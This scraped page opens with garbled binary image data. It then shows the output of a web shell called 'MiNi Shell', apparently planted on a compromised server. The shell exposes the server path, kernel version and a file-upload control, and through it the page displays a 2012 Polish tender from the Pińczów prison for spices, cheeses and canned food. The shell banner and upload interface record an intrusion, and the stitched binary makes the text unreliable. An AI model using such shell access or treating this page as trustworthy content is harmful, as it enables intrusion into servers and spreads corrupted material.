JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120917/199441-N-2012.html

<p class="kh_header"><b>Pińczów: Dostawy przypraw, serów, konserw do ZK Pińczów</b><br>
<b>Numer ogłoszenia: 199441 - 2012; data zamieszczenia: 17.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Pińczowie , ul. 3-go  Maja 34, 28-400 Pińczów, woj. świętokrzyskie, tel. 041 3577372, faks 041 3577373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieziennictwo.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy przypraw, serów, konserw do ZK Pińczów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A zamówienia: 
herbata czarna granulowana - kod CPV 15863000-5, spełniająca wymagania normy PN-ISO 3720:1997 - opakowaniu zbiorcze 5kg lub mniejsze, ilość około 60kg,
żurek w proszku- kod CPV 15891100-0, spełniający wymagania normy PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 400kg, 
cukier biały - kod CPV 15831200-4:, spełniający wymagania normy PN-A-74850- opakowanie zbiorcze 50kg lub mniejsze,  ilość około 10 000kg,
barszcz czerwony w proszku - kod CPV 15891000-0:, spełniający wymagania normy PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 500kg, 
bulion mięsny w proszku - kod CPV 15891500-5:, spełniający wymagania normy PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 780kg,
przyprawa Typu: jarzynka w proszku - kod CPV 15870000-7: opakowanie zbiorcze 10kg lub mniejsze,  ilość około 1000kg,
kwasek cytrynowy - kod CPV 15870000-7:, spełniający wymagania normy PN-81A-79734 opakowanie zbiorcze 10kg lub mniejsze,  ilość około 35kg,
liść laurowy - kod CPV 15871000-7:, spełniający wymagania normy PN-R-870022 opakowanie zbiorcze 10kg lub mniejsze,  ilość około 60kg, 
majeranek - kod CPV 15871000-7:, spełniający wymagania normy PN-86958:1997AZ1:2002 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 30kg,
papryka czerwona mielona ostra - kod CPV 15870000-7:, spełniająca wymagania normy PN-A-86955:1997AZ1:2002 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 30kg,
pieprz mielony czarny - kod CPV 15872100-2: spełniający wymagania normy PN-A-869651997AZ1;2002 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 100kg,
przyprawa do zup w płynie - kod CPV 15870000-4:, spełniająca wymagania normy PN-A-94052 - butelki o pojemności 1 litra,  ilość około 700litrów,
sól kuchenna - kod CPV 15872400-5:, spełniająca wymagania normy PN-C-84081-2:1998 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 1000kg,
ziele angielskie - kod CPV 15870000-4:, spełniające wymagania normy PN-97A-86966 opakowanie zbiorcze 10kg lub mniejsze,  ilość około 55kg,
zupa pieczarkowa w proszku - kod CPV 15891100-0:, spełniająca wymagania normy          PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 300kg,
soja - kostka - kod CPV 15890000-3 :, spełniająca wymagania normy ZN-197 lub równoważną, opakowanie zbiorcze 10kg lub mniejsze,  ilość około  600kg,
granulat sojowy kod CPV 15890000-3:, spełniająca wymagania normy ZN-197 lub równoważną, opakowanie zbiorcze 10kg lub mniejsze,  ilość około 700kg.
kotlet sojowy a la Schabowy kod CPV 15890000-3:, spełniająca wymagania normy ZN-1 97 lub równoważną, opakowanie zbiorcze 10kg lub mniejsze,  ilość około 50kg.
musztarda stołowa- skład: woda, ocet spirytusowy, gorczyca, cukier, sól, przyprawy, kod CPV-15871250-1, w opakowaniach do 10kg lub mniejsze,  ilość 500kg.
Część B zamówienia: 
serek  topiony tłusty -zawartość tłuszczu: nie mniej niż 16%, kod CPV 15540000-5,  ilość około  3200kg  (waga 1szt.-100g),
serek typu Fromage (100g-szt.)-   ilość około 100kg, kod CPV 15540000-5 o 
smaku:  z czosnkiem, z warzywami, ze szczypiorkiem, naturalny bez dodatków smakowych.  	
Część C zamówienia: 
Konserwa turystyczna - waga 1 puszki 130g-szt. kod CPV -15131000-5,  ilość około 1600kg,
Konserwa wieprzowa mięsna z otwieraczem - waga  1 puszki 300g-szt. kod CPV -15131000-5,  ilość około 2300kg,
Pasztet drobiowy w puszce - waga 1 puszki 130g-szt.   kod CPV -15131000-5, ilość około 2000kg,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium: część A zamówienia: 1900,00zł, część B zamówienia: 1000,00zł, część C zamówienia: 1000,00zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią n/w warunki wyszczególnione w art.22 ust.1 ustawy i nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy i spełnią warunki dodatkowe:   
-  Zaoferują realizację pełnego asortymentu składającego się na całość lub wybraną do realizacji część  zamówienia. 
-  Utrzymają stałe ceny podane w Formularzu Ofertowym przez cały okres obowiązywania umowy. 
-  Zaakceptują płatność faktur przelewem w terminie minimum  30 dni licząc od daty otrzymania faktur przez Zamawiającego.
-  Spełnią wszystkie wymagania wynikające z oświadczeń i dokumentów  wymienionych    w  SIWZ.
-  Zaakceptują projekt przyszłej umowy.
-  Wniosą  w terminie wymagane wadium. 
-  Złożą ofertę zawierającą dokumenty i oświadczenia wyszczególnione w SIWZ czyli:
- Oświadczenia stanowiące załączniki nr 1 i 2 do SIWZ 
- Formularz ofertowy stanowiący załącznik nr 3
Oferty zostaną sprawdzone czy zostały sporządzone zgodnie z przepisami ustawowymi 
i postanowieniami specyfikacji istotnych warunków zamówienia, a następnie ocenione zgodnie z kryteriami i warunkami zawartymi w specyfikacji istotnych warunków zamówienia na zasadzie: wykazał/ nie wykazał. Nie  spełnienie  chociażby  jednego  z w/w  warunków  skutkować  będzie  wykluczeniem  wykonawcy z postępowania      o udzielnie zamówienia. Spełnienie warunków udziału w postępowaniu będzie oceniane na podstawie w/w oświadczeń i dokumentów złożonych z ofertą (wykazał/ nie wykazał).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia nieodpłatnie na pisemny wniosek zainteresowanego można odebrać w siedzibie Zamawiającego, lok. 20 lub ściągnąć ze strony internetowej www.zp.sw.gov.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2012 godzina 08:30, miejsce: Otwarcie ofert nastąpi dnia 25.09.2012r. o godzinie 09:00 w siedzibie Zamawiającego - świetlica Zakładu Karnego w Pińczowie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część A zamówienia: 
herbata czarna granulowana - kod CPV 15863000-5, spełniająca wymagania normy PN-ISO 3720:1997 - opakowaniu zbiorcze 5kg lub mniejsze, ilość około 60kg,
żurek w proszku- kod CPV 15891100-0, spełniający wymagania normy PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 400kg, 
cukier biały - kod CPV 15831200-4:, spełniający wymagania normy PN-A-74850- opakowanie zbiorcze 50kg lub mniejsze,  ilość około 10 000kg,
barszcz czerwony w proszku - kod CPV 15891000-0:, spełniający wymagania normy PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 500kg, 
bulion mięsny w proszku - kod CPV 15891500-5:, spełniający wymagania normy PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 780kg,
przyprawa Typu: jarzynka w proszku - kod CPV 15870000-7: opakowanie zbiorcze 10kg lub mniejsze,  ilość około 1000kg,
kwasek cytrynowy - kod CPV 15870000-7:, spełniający wymagania normy PN-81A-79734 opakowanie zbiorcze 10kg lub mniejsze,  ilość około 35kg,
liść laurowy - kod CPV 15871000-7:, spełniający wymagania normy PN-R-870022 opakowanie zbiorcze 10kg lub mniejsze,  ilość około 60kg, 
majeranek - kod CPV 15871000-7:, spełniający wymagania normy PN-86958:1997AZ1:2002 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 30kg,
papryka czerwona mielona ostra - kod CPV 15870000-7:, spełniająca wymagania normy PN-A-86955:1997AZ1:2002 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 30kg,
pieprz mielony czarny - kod CPV 15872100-2: spełniający wymagania normy PN-A-869651997/AZ1;2002 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 100kg,
przyprawa do zup w płynie - kod CPV 15870000-4:, spełniająca wymagania normy PN-A-94052 - butelki o pojemności 1 litra,  ilość około 700litrów,
sól kuchenna - kod CPV 15872400-5:, spełniająca wymagania normy PN-C-84081-2:1998 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 1000kg,
ziele angielskie - kod CPV 15870000-4:, spełniające wymagania normy PN-97A-86966 opakowanie zbiorcze 10kg lub mniejsze,  ilość około 55kg,
zupa pieczarkowa w proszku - kod CPV 15891100-0:, spełniająca wymagania normy          PN-A-94050:1996 - opakowanie zbiorcze 10kg lub mniejsze,  ilość około 300kg,
soja - kostka - kod CPV 15890000-3 :, spełniająca wymagania normy ZN-197 lub równoważną, opakowanie zbiorcze 10kg lub mniejsze,  ilość około  600kg,
granulat sojowy kod CPV 15890000-3:, spełniająca wymagania normy ZN-197 lub równoważną, opakowanie zbiorcze 10kg lub mniejsze,  ilość około 700kg.
kotlet sojowy ala Schabowy kod CPV 15890000-3:, spełniająca wymagania normy ZN-197 lub równoważną, opakowanie zbiorcze 10kg lub mniejsze,  ilość około 50kg.
musztarda stołowa- skład: woda, ocet spirytusowy, gorczyca, cukier, sól, przyprawy, kod CPV-15871250-1, w opakowaniach do 10kg lub mniejsze,  ilość 500kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> sery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część B zamówienia: 
serek  topiony tłusty -zawartość tłuszczu: nie mniej niż 16%, kod CPV 15540000-5,  ilość około  3200kg  (waga 1szt./100g),
serek typu Fromage (100g/szt.)-   ilość około 100kg, kod CPV 15540000-5 o 
smaku:  z czosnkiem, z warzywami, ze szczypiorkiem, naturalny bez dodatków smakowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część C zamówienia: 
Konserwa turystyczna - waga 1 puszki 130g/szt. kod CPV -15131000-5,  ilość około 1600kg,
Konserwa wieprzowa mięsna z otwieraczem - waga  1 puszki 300g/szt. kod CPV -15131000-5,  ilość około 2300kg,
Pasztet drobiowy w puszce - waga 1 puszki 130g/szt.   kod CPV -15131000-5, ilość około 2000kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com